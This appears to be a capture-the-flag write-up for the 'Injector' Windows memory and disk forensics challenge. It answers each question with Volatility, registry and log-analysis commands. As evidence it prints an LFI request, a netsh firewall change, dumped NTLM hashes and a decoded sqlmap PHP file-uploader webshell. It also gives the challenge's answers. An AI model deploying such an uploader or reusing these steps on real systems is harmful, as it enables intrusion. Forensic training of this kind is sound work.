Injector - Windows Image Forensics

What is the computer's name?

# Load system registry in registry explorer
WIN-L0ZZQ76PMUF

What is the Timezone of the compromised machine? Format: UTC+0 (no-space)

# Load system registry in registry explorer
UTC-8

What was the first vulnerability the attacker was able to exploit?

# /xampp/logs/access.log
xss

What is the OS build number?

# analyze software registry in registry explorer
1616

How many users are on the compromised machine?

4

What is the webserver package installed on the machine?

xampp

What is the name of the vulnerable web app installed on the webserver?

dvwa

What is the user agent used in the HTTP requests sent by the SQL injection attack tool?

# analyze access.log in sublime using 'sqli/' keyword
sqlmap/1.0-dev-nongit-20150902

The attacker read multiple files through LFI vulnerability. One of them is related to network configuration. What is the filename?

# Use '/fi' keyword
# 192.168.56.102 - - [02/Sep/2015:02:31:16 -0700] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4397 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0"

hosts

The attacker tried to update some firewall rules using netsh command. Provide the value of the type parameter in the executed command?

$ volatility -f Breach/memdump.mem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : VistaSP1x86, Win2008SP1x86, Win2008SP2x86, VistaSP2x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/hnl/Desktop/ctf/cyberdefenders/injector/Breach/memdump.mem)
                      PAE type : PAE
                           DTB : 0x122000L
                          KDBG : 0x81716c90L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x81717800L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2015-09-03 10:04:05 UTC+0000
     Image local date and time : 2015-09-03 03:04:05 -0700

$ volatility -f Breach/memdump.mem --profile VistaSP1x86 consoles

# Microsoft Windows [Version 6.0.6001]                                            
# Copyright (c) 2006 Microsoft Corporation.  All rights reserved.                 

# C:\Users\Administrator>netsh fireall set service type=remotedesktop mode=enable 
# scope=subnet                                                                    
# The following command was not found: fireall set service type=remotedesktop mode
# =enable scope=subnet.                                                           

# C:\Users\Administrator>netsh firewall set service type=remotedesktop mode=enable
#  scope=subnet                                                                   
# Ok.   

remotedesktop

How many users were added by the attacker?

2

When did the attacker create the first user?

> rip.exe -r <path-SAM-registry> -a

# Username        : user1 [1005]
# Full Name       : 
# User Comment    : 
# Account Type    : Custom Limited Acct
# Account Created : 2015-09-02 09:05:06Z
# Name            :  
# Last Login Date : Never
# Pwd Reset Date  : 2015-09-02 09:05:06Z
# Pwd Fail Date   : Never
# Login Count     : 0
# Embedded RID    : 1005
#   --> Normal user account

# Username        : hacker [1006]
# Full Name       : 
# User Comment    : 
# Account Type    : Custom Limited Acct
# Account Created : 2015-09-02 09:05:25Z
# Name            :  
# Last Login Date : Never
# Pwd Reset Date  : 2015-09-02 09:05:25Z
# Pwd Fail Date   : Never
# Login Count     : 0
# Embedded RID    : 1006
#   --> Normal user account

2015-09-02 09:05:06

What is the NThash of the user's password set by the attacker?

$ volatility -f Breach/memdump.mem --profile VistaSP1x86 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:63d6a39b8467b94ae92ab1931d4079dd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user1:1005:aad3b435b51404eeaad3b435b51404ee:817875ce4794a9262159186413772644:::
hacker:1006:aad3b435b51404eeaad3b435b51404ee:817875ce4794a9262159186413772644:::

What is The MITRE ID corresponding to the technique used to keep persistence?

# Use this keyword in google 'the user create local account and add remote desktop user mitre'
T1136.001

The attacker uploaded a simple command shell through file upload vulnerability. Provide the name of the URL parameter used to execute commands?

# use this keyword to find parameter in access.log '.php?'
cmd

One of the uploaded files by the attacker has an md5 that starts with "559411". Provide the full hash.

# /xampp/htodcs/DVWA/webshell.php
$ md5sum webshell.php 
5594112b531660654429f8639322218b  webshell.php

The attacker used Command Injection to add user "hacker" to the "Remote Desktop Users" Group. Provide the IP address that was part of the executed command?

$ volatility -f Breach/memdump.mem --profile VistaSP1x86 memdump --pid 2880 -D ./
$ strings 2880.dmp
$ subl 2880.dmp # And filter 'hacker'
192.168.56.102

The attacker dropped a shellcode through SQLi vulnerability. The shellcode was checking for a specific version of PHP. Provide the PHP version number?

# decode this 'hex' payload

# 3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c78616d70705c5c6874646f63735c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a

<?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=\\xampp\\htdocs\\> <input type=submit name=upload value=upload></form>";}?>
PreviousWindows, Linux, Mac Image ForensicsNextHunter - Windows Image Forensics

Last updated

Was this helpful?